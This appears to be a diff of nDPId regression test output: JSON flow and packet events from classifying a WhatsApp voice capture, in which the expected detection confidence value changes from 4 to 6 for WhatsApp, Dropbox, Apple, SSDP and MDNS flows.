+00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":61,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455689728,"flow_last_seen":1561455689761,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1561455689761,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":55296,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"dns": {"query":"media-mxp1-1.cdn.whatsapp.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.86.51"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455689909,"flow_last_seen":1561455689909,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1561455689909,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1561455689909,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1561455689909,"pkt":"xiwDYGpkkLkxKPrKCABFAABAAABAAEAGAsTAqAIMHw1WM8VHAbtOnG1kAAAAALDC\/\/9BlgAAAgQFtAEDAwcBAQgKNM4E3wAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1561455689928,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1561455689928,"pkt":"kLkxKPrKxiwDYGpkCABFAAA8AAAAAFQGLsgfDVYzwKgCDAG7xUfuAwj8TpxtZaASbHDC9wAAAgQFeAQCCAqHqaVzNM4E3wEDAwg="} 
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1561455690036,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455690036,"pkt":"xiwDYGpkkLkxKPrKCABFAAA0AABAAEAGAtDAqAIMHw1WM8VHAbtOnG1l7gMI\/YAQBAZZdQAAAQEICjTOBV2HqaVz"} -00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1561455689909,"flow_last_seen":1561455690039,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1561455690039,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media-mxp1-1.cdn.whatsapp.net","ja3":"b92a79ed03c3ff5611abb2305370d3e3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1561455689909,"flow_last_seen":1561455690058,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1561455690058,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.3","client_requested_server_name":"media-mxp1-1.cdn.whatsapp.net","ja3":"b92a79ed03c3ff5611abb2305370d3e3","ja3s":"475c9302dc42b2751db9edcac3b74891","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1561455689909,"flow_last_seen":1561455690039,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1561455690039,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media-mxp1-1.cdn.whatsapp.net","ja3":"b92a79ed03c3ff5611abb2305370d3e3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1561455689909,"flow_last_seen":1561455690058,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1561455690058,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.3","client_requested_server_name":"media-mxp1-1.cdn.whatsapp.net","ja3":"b92a79ed03c3ff5611abb2305370d3e3","ja3s":"475c9302dc42b2751db9edcac3b74891","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":181,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455701309,"flow_last_seen":1561455701309,"flow_idle_time":200000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1561455701309,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00902{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1561455701309,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":383,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":383,"pkt_l4_len":349,"thread_ts_msec":1561455701309,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAFxXcMAAEARlWjAqAIBwKgC\/0RcRFwBXbU+eyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAxNzQ1NjcxOTM5MjIwMTQ2OTg4Njg4NzAzNTEyMjAyNTg3OTI0NDMsICJkaXNwbGF5bmFtZSI6ICIiLCAibmFtZXNwYWNlcyI6IFsyNzUwMzcwNTYwLCA3ODUyNjYxNzcsIDE1MjYyNjMwNDUsIDEzMzg2NTkyMDEsIDE0ODE5MzM3LCA0ODA5NDIwMDQ4LCA1MTE3MDY2NDIsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA0ODEwNTkxNzYwLCA1ODM0NDk5NiwgOTk2MzA2MjE1LCA1MzAzMzAxMjQ4LCAzMDc1NTIxNjk2LCA0MDU2NDYyNTkyLCAyOTYzNjgyMDk2LCAxNTIyMTc3NTg3XX0="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455701309,"flow_last_seen":1561455701309,"flow_idle_time":200000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1561455701309,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455701309,"flow_last_seen":1561455701309,"flow_idle_time":200000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1561455701309,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00899{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1561455701310,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"thread_ts_msec":1561455701310,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAFvHu4AAEAR1D\/AqAIBwKgC\/0RcRFwBW7HJeyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAxNzQ1NjcxOTM5MjIwMTQ2OTg4Njg4NzAzNTEyMjAyNTg3OTI0NDMsICJkaXNwbGF5bmFtZSI6ICIiLCAibmFtZXNwYWNlcyI6IFsxMTgyMzk1NTczLCAxNDIxMTE0Mzk5LCAxODA4MDQ3NjgwLCAxMzcyMDkyNjA5LCAxMjUyMTE2NDI5LCA5OTQ2OTc3MywgNTI1ODAwNzEyMCwgMTc2OTY0MzA3LCAxMjU1NDA1NjYsIDEwNDc0MjgxODksIDQ3MTYxOTAwNDgsIDU0NjcxNjMwODgsIDExOTUwNDQwNzEsIDk2ODUzMjI0LCAxNzYwOTk2MywgNDUxNDcyNjU4LCA0MTc0NjUwODgwLCAyODUyMTYwNywgMTQxNTYyMDM1MF19"} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":186,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455702980,"flow_last_seen":1561455702980,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1561455702980,"l3_proto":"ip4","src_ip":"17.171.47.85","dst_ip":"192.168.2.12","src_port":443,"dst_port":50502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1561455702980,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1561455702980,"pkt":"kLkxKPrKxiwDYGpkCABFAgBT1H4AAC8Gs3ARqy9VwKgCDAG7xUbop23K2+r6qYAYAEJmGwAAAQEICipMBbM0zcKkFQMDABo0yWx0nf4Y8Lruj7Xpo7KOiHQ6o5fprSXAlA=="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455702980,"flow_last_seen":1561455702980,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1561455702980,"l3_proto":"ip4","src_ip":"17.171.47.85","dst_ip":"192.168.2.12","src_port":443,"dst_port":50502,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455702980,"flow_last_seen":1561455702980,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1561455702980,"l3_proto":"ip4","src_ip":"17.171.47.85","dst_ip":"192.168.2.12","src_port":443,"dst_port":50502,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":187,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1561455702981,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455702981,"pkt":"kLkxKPrKxiwDYGpkCABFAAA01H8AAC8Gs5ARqy9VwKgCDAG7xUbop23p2+r6qYARAEJXLQAAAQEICipMBbM0zcKk"} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1561455703144,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1561455703144,"pkt":"xiwDYGpkkLkxKPrKCABFAgBTAABAAEAGNu\/AqAIMEasvVcVGAbvb6vqp6KdtyoAYBACmYwAAAQEICjTOOFoqS5CDFQMDABoAAAAAAAAAAyfFNdvhqDfXGuNhDL9lpNkkKA=="} 
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":197,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455704556,"flow_last_seen":1561455704556,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455704556,"l3_proto":"ip4","src_ip":"169.254.162.244","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1561455704556,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455704556,"pkt":"AQBef\/\/62DBiVgAcCABFAACa1ogAAP8Rp9yp\/qL07\/\/\/+sTQB2wAhsguTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":197,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455704556,"flow_last_seen":1561455704556,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455704556,"l3_proto":"ip4","src_ip":"169.254.162.244","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":197,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455704556,"flow_last_seen":1561455704556,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455704556,"l3_proto":"ip4","src_ip":"169.254.162.244","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":198,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455704557,"flow_last_seen":1561455704557,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455704557,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1561455704557,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455704557,"pkt":"AQBef\/\/6xiwDYGpkCABFAACadbUAAAERkPrAqAIB7\/\/\/+sTQB2wAhlJ4TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"} 
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":198,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455704557,"flow_last_seen":1561455704557,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455704557,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":198,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455704557,"flow_last_seen":1561455704557,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455704557,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":199,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455705874,"flow_last_seen":1561455705874,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1561455705874,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1561455705874,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1561455705874,"pkt":"AQBeAAD7kLkxKPrKCABFAABNhSMAAP8RkszAqAIM4AAA+xTpFOkAOcRFAAAAAAACAAAAAAAABV9yYW9wBF90Y3AFbG9jYWwAAAyAAQhfYWlycGxhecASAAyAAQ=="} -00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455705874,"flow_last_seen":1561455705874,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1561455705874,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}} +00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455705874,"flow_last_seen":1561455705874,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1561455705874,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455705874,"flow_last_seen":1561455705874,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1561455705874,"l3_proto":"ip6","src_ip":"fe80::414:409d:8afd:9f05","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1561455705874,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":111,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":111,"pkt_l4_len":57,"thread_ts_msec":1561455705874,"pkt":"MzMAAAD7kLkxKPrKht1gDagnADkR\/\/6AAAAAAAAABBRAnYr9nwX\/AgAAAAAAAAAAAAAAAAD7FOkU6QA5+sIAAAAAAAIAAAAAAAAFX3Jhb3AEX3RjcAVsb2NhbAAADIABCF9haXJwbGF5wBIADIAB"} -00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455705874,"flow_last_seen":1561455705874,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1561455705874,"l3_proto":"ip6","src_ip":"fe80::414:409d:8afd:9f05","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}} 
+00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455705874,"flow_last_seen":1561455705874,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1561455705874,"l3_proto":"ip6","src_ip":"fe80::414:409d:8afd:9f05","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1561455706881,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1561455706881,"pkt":"AQBeAAD7kLkxKPrKCABFAABNdOIAAP8Row3AqAIM4AAA+xTpFOkAOUTGAAAAAAACAAAAAAAABV9yYW9wBF90Y3AFbG9jYWwAAAwAAQhfYWlycGxhecASAAwAAQ=="} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1561455706881,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":111,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":111,"pkt_l4_len":57,"thread_ts_msec":1561455706881,"pkt":"MzMAAAD7kLkxKPrKht1gDagnADkR\/\/6AAAAAAAAABBRAnYr9nwX\/AgAAAAAAAAAAAAAAAAD7FOkU6QA5e0MAAAAAAAIAAAAAAAAFX3Jhb3AEX3RjcAVsb2NhbAAADAABCF9haXJwbGF5wBIADAAB"} 
